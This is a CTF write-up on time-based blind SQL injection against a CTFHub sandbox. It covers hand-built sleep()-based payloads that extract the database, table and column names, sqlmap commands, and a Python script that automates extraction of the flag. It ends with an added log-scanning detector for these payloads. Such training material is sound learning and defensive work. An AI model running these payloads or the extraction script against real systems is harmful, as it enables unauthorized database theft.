CTFHub-web (SQL time-based blind injection)


Contents

    • Manual injection
    • sqlmap injection
    • Using a script
    • Summary

Manual injection

1. Challenge information

2. The page responds only after 3 seconds, which means the database name has length 4:
1 and if(length(database())=4,sleep(3),1)


3. Guessing the database name
1 and if(ascii(substr(database(),1,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)    ascii(s)=115
1 and if(ascii(substr(database(),2,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)    ascii(q)=113
1 and if(ascii(substr(database(),3,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=108,sleep(3),1)    ascii(l)=108
1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)    ascii(i)=105
......
Narrowing the ASCII range step by step (a 3-second response means the comparison was true) yields the database name sqli.


4. Number of tables in the sqli database
1 and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(3),1)

The page responds after 3 seconds, so there are two tables.

5. Guessing the table names
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)    ascii(n)=110
Responds after 3 seconds, so the first letter of the first table is n; working through the remaining positions the same way gives the table name news.

1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)    ascii(f)=102
Responds after 3 seconds, so the first letter of the second table (limit 1,1) is f; the remaining positions give the table name flag.

6. Guessing the number of columns in the flag table
1 and if((select count(column_name) from information_schema.columns where table_name='flag')=1,sleep(3),1)

Responds after 3 seconds: there is only one column.

7. Guessing the column name
1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=102,sleep(3),1)
Same approach as before; the column name turns out to be flag.

8. Guessing the flag value itself
Doing this by hand is far too time-consuming, so the manual part stops here and we switch to sqlmap.

sqlmap injection

I ran this under Kali Linux.
For installing and using SQLMap on Windows see:
https://blog.csdn.net/weixin_45254208/article/details/104697014
1. Database name
Kali:
sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.ctfhub.com:10080/?id=1" --dbs

Windows:
python sqlmap.py -u "http://challenge-3c2ee474fb29b646.sandbox.ctfhub.com:10080/?id=1" --dbs

Note the difference between the two invocations; the rest of this section uses the Kali form and does not repeat the Windows one.

2. Table names
sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.ctfhub.com:10080/?id=1" -D sqli --tables


3. Column names and the flag
sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.ctfhub.com:10080/?id=1" -D sqli -T flag --columns --dump


The challenge environment timed out at this point, so the last small part of the flag was not displayed.

Using a script

#!/usr/bin/env python
# _*_coding:utf-8 _*_
import requests
import sys
import time

session = requests.Session()
url = "http://challenge-e53e5a329b0199fa.sandbox.ctfhub.com:10080/?id="
name = ""

# Phase 1: recover a name one character at a time. k is only consumed by the
# table-name payload (limit k,1); the database-name and column-name payloads ignore it.
for k in range(1, 10):
    for i in range(1, 10):
        print(i)
        # try printable ASCII from high to low, one request per candidate character
        for j in range(127, 31, -1):
            str_ascii = chr(j)
            # database name
            payload = "if(substr(database(),%d,1) = '%s',sleep(1),1)" % (i, str_ascii)
            # table name
            # payload = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',sleep(1),1)" % (k, i, str_ascii)
            # column name
            # payload = "if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),%d,1) = '%s',sleep(1),1)" % (i, str_ascii)
            start_time = time.time()
            session.get(url=url + payload)
            t = time.time() - start_time
            # a response slower than the sleep() delay means the guess was correct
            if t > 1:
                if str_ascii == "+":
                    sys.exit()
                name += str_ascii
                break
        print(name)

# Phase 2: read the contents of the flag column
for i in range(1, 50):
    print(i)
    for j in range(127, 31, -1):
        str_ascii = chr(j)
        payload = "if(substr((select flag from sqli.flag),%d,1) = '%s',sleep(1),1)" % (i, str_ascii)
        start_time = time.time()
        session.get(url=url + payload)
        t = time.time() - start_time
        if t > 1:
            if str_ascii == "+":
                sys.exit()
            name += str_ascii
            break
    print(name)
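As an added defender-side example (not part of the original write-up), the following Python scans constructed web-server access-log lines for the SQL function names the payloads above rely on (sleep, substr, ascii, length, information_schema) and correlates them with the per-request response time, which is exactly the signal a time-based blind injection leaves behind. The log format, the sample lines and the 1-second threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not from the write-up): common log format with
# the request time in seconds appended as the last field, like nginx $request_time.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2021:12:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 0.012
10.0.0.5 - - [10/May/2021:12:00:02 +0000] "GET /?id=1%20and%20if(length(database())%3D4%2Csleep(3)%2C1) HTTP/1.1" 200 512 3.014
10.0.0.5 - - [10/May/2021:12:00:06 +0000] "GET /?id=1%20and%20if(ascii(substr(database()%2C1%2C1))%3E110%2Csleep(3)%2C1) HTTP/1.1" 200 512 3.011
10.0.0.7 - - [10/May/2021:12:00:07 +0000] "GET /?id=2 HTTP/1.1" 200 498 0.009
10.0.0.5 - - [10/May/2021:12:00:10 +0000] "GET /?id=if(substr((select%20flag%20from%20sqli.flag)%2C1%2C1)%3D'c'%2Csleep(1)%2C1) HTTP/1.1" 200 512 1.020
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<bytes>\d+) (?P<secs>[\d.]+)$')

# SQL function names and the schema reference that the payloads in this write-up use.
MARKER_RE = re.compile(
    r"\b(?:sleep|benchmark|substr|substring|ascii|length)\s*\(|information_schema", re.I)


def classify_line(line, slow_threshold=1.0):
    """Parse one log line: SQLi markers in the decoded query string plus the timing signal."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    decoded = unquote_plus(urlsplit(m.group("target")).query)
    markers = sorted({re.sub(r"\s+", "", x.group(0)).lower() for x in MARKER_RE.finditer(decoded)})
    secs = float(m.group("secs"))
    # markers alone flag the request; a slow response on top of them is the
    # time-based signature (sleep() fired because the injected condition was true)
    return {"ip": m.group("ip"), "markers": markers, "secs": secs,
            "suspicious": bool(markers),
            "slow_confirmed": bool(markers) and secs >= slow_threshold}


def suspicious_sources(log_text, slow_threshold=1.0):
    """Per client IP: requests carrying markers, and how many of them were also slow."""
    summary = {}
    for line in log_text.splitlines():
        r = classify_line(line, slow_threshold)
        if r and r["suspicious"]:
            s = summary.setdefault(r["ip"], {"requests": 0, "slow_confirmed": 0})
            s["requests"] += 1
            s["slow_confirmed"] += int(r["slow_confirmed"])
    return summary
```

Calling suspicious_sources(SAMPLE_LOG) returns {'10.0.0.5': {'requests': 3, 'slow_confirmed': 3}}; the two clean requests, including the one from 10.0.0.7, are not reported.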

Summary

The approach is the same as for boolean-based blind injection, with response time standing in for page content; using sqlmap is the key to finishing in reasonable time.
